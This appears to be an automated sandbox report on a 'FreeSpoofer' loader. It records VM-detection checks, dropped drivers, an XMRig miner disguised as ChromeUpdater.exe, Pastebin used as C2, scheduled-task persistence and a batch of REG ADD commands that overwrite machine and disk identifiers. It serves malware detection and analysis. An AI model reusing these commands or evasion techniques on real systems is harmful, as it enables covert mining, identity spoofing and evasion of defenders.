Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 20:13
Behavioral task
behavioral1
Sample
FreeSpoofer/AppleCleaner [I DO NOT OWN IT].exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
FreeSpoofer/AppleCleaner [I DO NOT OWN IT].exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
FreeSpoofer/Loader.exe
Resource
win7-20240903-en
General
-
Target
FreeSpoofer/Loader.exe
-
Size
26.4MB
-
MD5
aec49804a232eb45a7cf41e2dfef37fc
-
SHA1
5cedbd522c3c40305f6d656f57edf9b6a89d7e21
-
SHA256
deb7985a8f9a56f2dcbfdd4c5fa4732daad89ce82733818915f3a4e07c2d3b09
-
SHA512
ad9cf94db9a109e0f3a191169025c4f5ec86aca68937c373380dcb84c728b5817bf5e7bee8eea47b7cb82f5415234ab08a53f26030a5573d574477571f3a3d3d
-
SSDEEP
786432:pfjx8ZSLqcnnTNPefii+ydGI5mM3y9nEDQ:pfadJy9nQQ
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
description pid Process procid_target PID 2156 created 1164 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 21 PID 2156 created 1164 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 21 PID 2156 created 1164 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 21 PID 2156 created 1164 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 21 PID 2148 created 1164 2148 ChromeUpdater.exe 21 PID 2148 created 1164 2148 ChromeUpdater.exe 21 PID 2148 created 1164 2148 ChromeUpdater.exe 21 PID 2148 created 1164 2148 ChromeUpdater.exe 21 -
Xmrig family
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions Loader.exe -
XMRig Miner payload 8 IoCs
resource yara_rule behavioral3/memory/2148-100-0x000000013F2A0000-0x000000013FC6A000-memory.dmp xmrig behavioral3/memory/888-103-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral3/memory/888-105-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral3/memory/888-107-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral3/memory/888-136-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral3/memory/888-138-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral3/memory/888-140-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral3/memory/888-142-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
pid Process 628 powershell.exe 3000 powershell.exe 2396 powershell.exe 1064 powershell.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools Loader.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\OcMcanCeIwcnojmhNPfBEGPX\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\OcMcanCeIwcnojmhNPfBEGPX" ItkjdoYQsELiMeskxLaqyjtuJlHZNN.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loader.exe -
Executes dropped EXE 6 IoCs
pid Process 948 ItkjdoYQsELiMeskxLaqyjtuJlHZNN.exe 1692 CfixpFpEtfLkgyHaApexyFwKResPnA.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2148 ChromeUpdater.exe 2448 KrDzBiKsGeNlBHsHKTbzHPqJtpGgRJ.exe 2632 axzUfSwRkNuKSagBxydFtZidHJOQac.exe -
Loads dropped DLL 9 IoCs
pid Process 1996 Loader.exe 1996 Loader.exe 820 taskeng.exe 1996 Loader.exe 2900 WerFault.exe 2900 WerFault.exe 2900 WerFault.exe 2900 WerFault.exe 2900 WerFault.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 pastebin.com 5 pastebin.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum Loader.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 Loader.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2148 set thread context of 604 2148 ChromeUpdater.exe 82 PID 2148 set thread context of 888 2148 ChromeUpdater.exe 83 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\ChromeUpdater.exe IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe File created C:\Program Files\Google\Libs\WR64.sys ChromeUpdater.exe -
Drops file in Windows directory 12 IoCs
description ioc Process File created C:\Windows\Cursors\OXKFkEITjKyJueqNflnRKiWGEnhzhl.exe Loader.exe File opened for modification C:\Windows\Cursors\OXKFkEITjKyJueqNflnRKiWGEnhzhl.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\GhpWsJUORbyzSDfmdAIYKDvmgBDAxX.sys Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\GhpWsJUORbyzSDfmdAIYKDvmgBDAxX.sys Loader.exe File created C:\Windows\SoftwareDistribution\Download\iyMGIwkwWzmIyDcXhZFAuhaJHbxjjQ.sys Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\iyMGIwkwWzmIyDcXhZFAuhaJHbxjjQ.sys Loader.exe File created C:\Windows\SoftwareDistribution\Download\ofuCsJzWcWpKrYJLPQjAZGovKZiNfv.exe Loader.exe File created C:\Windows\Cursors\CfixpFpEtfLkgyHaApexyFwKResPnA.exe Loader.exe File created C:\Windows\Cursors\DVYzsmAtGMlJoELZxIsMxNQzloUAhA.sys Loader.exe File opened for modification C:\Windows\Cursors\DVYzsmAtGMlJoELZxIsMxNQzloUAhA.sys Loader.exe File created C:\Windows\SoftwareDistribution\Download\IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\ofuCsJzWcWpKrYJLPQjAZGovKZiNfv.exe Loader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2900 2632 WerFault.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CfixpFpEtfLkgyHaApexyFwKResPnA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axzUfSwRkNuKSagBxydFtZidHJOQac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Enumerates system info in registry 2 TTPs 19 IoCs
description ioc Process Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information reg.exe Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "3193004-02754e3c-A" reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4 reg.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5047cc17523cdb01 powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 788 schtasks.exe 2072 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1996 Loader.exe 1996 Loader.exe 1692 CfixpFpEtfLkgyHaApexyFwKResPnA.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2396 powershell.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 628 powershell.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2156 IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 1064 powershell.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 3000 powershell.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 1996 Loader.exe 888 explorer.exe 2632 axzUfSwRkNuKSagBxydFtZidHJOQac.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe 888 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 948 ItkjdoYQsELiMeskxLaqyjtuJlHZNN.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1996 Loader.exe Token: SeLoadDriverPrivilege 948 ItkjdoYQsELiMeskxLaqyjtuJlHZNN.exe Token: SeDebugPrivilege 1692 CfixpFpEtfLkgyHaApexyFwKResPnA.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 628 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeLockMemoryPrivilege 888 explorer.exe Token: SeDebugPrivilege 2632 axzUfSwRkNuKSagBxydFtZidHJOQac.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1996 Loader.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1996 wrote to memory of 948 1996 Loader.exe 32 PID 1996 wrote to memory of 948 1996 Loader.exe 32 PID 1996 wrote to memory of 948 1996 Loader.exe 32 PID 1996 wrote to memory of 1692 1996 Loader.exe 35 PID 1996 wrote to memory of 1692 1996 Loader.exe 35 PID 1996 wrote to memory of 1692 1996 Loader.exe 35 PID 1996 wrote to memory of 1692 1996 Loader.exe 35 PID 1692 wrote to memory of 2852 1692 CfixpFpEtfLkgyHaApexyFwKResPnA.exe 37 PID 1692 wrote to memory of 2852 1692 CfixpFpEtfLkgyHaApexyFwKResPnA.exe 37 PID 1692 wrote to memory of 2852 1692 CfixpFpEtfLkgyHaApexyFwKResPnA.exe 37 PID 1692 wrote to memory of 2852 1692 CfixpFpEtfLkgyHaApexyFwKResPnA.exe 37 PID 2852 wrote to memory of 1708 2852 cmd.exe 39 PID 2852 wrote to memory of 1708 2852 cmd.exe 39 PID 2852 wrote to memory of 1708 2852 cmd.exe 39 PID 2852 wrote to memory of 1708 2852 cmd.exe 39 PID 2852 wrote to memory of 2408 2852 cmd.exe 40 PID 2852 wrote to memory of 2408 2852 cmd.exe 40 PID 2852 wrote to memory of 2408 2852 cmd.exe 40 PID 2852 wrote to memory of 2408 2852 cmd.exe 40 PID 2852 wrote to memory of 2484 2852 cmd.exe 41 PID 2852 wrote to memory of 2484 2852 cmd.exe 41 PID 2852 wrote to memory of 2484 2852 cmd.exe 41 PID 2852 wrote to memory of 2484 2852 cmd.exe 41 PID 2852 wrote to memory of 1720 2852 cmd.exe 42 PID 2852 wrote to memory of 1720 2852 cmd.exe 42 PID 2852 wrote to memory of 1720 2852 cmd.exe 42 PID 2852 wrote to memory of 1720 2852 cmd.exe 42 PID 2852 wrote to memory of 2832 2852 cmd.exe 43 PID 2852 wrote to memory of 2832 2852 cmd.exe 43 PID 2852 wrote to memory of 2832 2852 cmd.exe 43 PID 2852 wrote to memory of 2832 2852 cmd.exe 43 PID 2852 wrote to memory of 2856 2852 cmd.exe 44 PID 2852 wrote to memory of 2856 2852 cmd.exe 44 PID 2852 wrote to memory of 2856 2852 cmd.exe 44 PID 2852 wrote to memory of 2856 2852 cmd.exe 44 PID 2852 wrote to memory of 1384 2852 cmd.exe 45 PID 2852 wrote to memory of 1384 2852 cmd.exe 45 PID 2852 wrote to memory of 1384 2852 cmd.exe 45 PID 2852 wrote to memory of 1384 2852 cmd.exe 45 PID 2852 wrote to memory of 1552 2852 cmd.exe 46 PID 2852 wrote to memory of 1552 2852 cmd.exe 46 PID 2852 wrote to memory of 1552 2852 cmd.exe 46 PID 2852 wrote to memory of 1552 2852 cmd.exe 46 PID 2852 wrote to memory of 1780 2852 cmd.exe 47 PID 2852 wrote to memory of 1780 2852 cmd.exe 47 PID 2852 wrote to memory of 1780 2852 cmd.exe 47 PID 2852 wrote to memory of 1780 2852 cmd.exe 47 PID 2852 wrote to memory of 2356 2852 cmd.exe 48 PID 2852 wrote to memory of 2356 2852 cmd.exe 48 PID 2852 wrote to memory of 2356 2852 cmd.exe 48 PID 2852 wrote to memory of 2356 2852 cmd.exe 48 PID 2852 wrote to memory of 792 2852 cmd.exe 49 PID 2852 wrote to memory of 792 2852 cmd.exe 49 PID 2852 wrote to memory of 792 2852 cmd.exe 49 PID 2852 wrote to memory of 792 2852 cmd.exe 49 PID 2852 wrote to memory of 1616 2852 cmd.exe 50 PID 2852 wrote to memory of 1616 2852 cmd.exe 50 PID 2852 wrote to memory of 1616 2852 cmd.exe 50 PID 2852 wrote to memory of 1616 2852 cmd.exe 50 PID 2852 wrote to memory of 760 2852 cmd.exe 51 PID 2852 wrote to memory of 760 2852 cmd.exe 51 PID 2852 wrote to memory of 760 2852 cmd.exe 51 PID 2852 wrote to memory of 760 2852 cmd.exe 51 PID 2852 wrote to memory of 1248 2852 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Loads dropped DLL
- Maps connected drives based on registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\temp\ItkjdoYQsELiMeskxLaqyjtuJlHZNN.exe"C:\Windows\temp\ItkjdoYQsELiMeskxLaqyjtuJlHZNN.exe" C:\Users\Admin\AppData\Local\Microsoft\NsHonqSAqJzbTuUHJaHQKvOPZzparh.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\Cursors\CfixpFpEtfLkgyHaApexyFwKResPnA.exe"C:\Windows\Cursors\CfixpFpEtfLkgyHaApexyFwKResPnA.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\jniwbqk.bat""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:1708
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:2484
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:1384
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:1780
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:2356
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d 58e40295-5609-4b2a-b07e-5e91442a144a /f5⤵
- System Location Discovery: System Language Discovery
PID:792
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 61F45363F353DD55 /f5⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:760
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 3193004-02754e3c-A /f5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1248
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1592
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1836
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1556
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2928
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2984
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2956
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2964
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2764
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2936 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"6⤵
- System Location Discovery: System Language Discovery
PID:2920
-
-
-
-
-
C:\Windows\SoftwareDistribution\Download\IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe"C:\Windows\SoftwareDistribution\Download\IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2156
-
-
C:\Users\Admin\AppData\LocalLow\Microsoft\KrDzBiKsGeNlBHsHKTbzHPqJtpGgRJ.exe"C:\Users\Admin\AppData\LocalLow\Microsoft\KrDzBiKsGeNlBHsHKTbzHPqJtpGgRJ.exe" C:\Users\Admin\AppData\Local\..\LocalLow\Microsoft\sFjLbWwYQggioMuMBmraBlvUuAtGMb.sys3⤵
- Executes dropped EXE
PID:2448
-
-
C:\Users\Admin\AppData\LocalLow\Microsoft\axzUfSwRkNuKSagBxydFtZidHJOQac.exe"C:\Users\Admin\AppData\LocalLow\Microsoft\axzUfSwRkNuKSagBxydFtZidHJOQac.exe"3⤵
- Executes dropped EXE
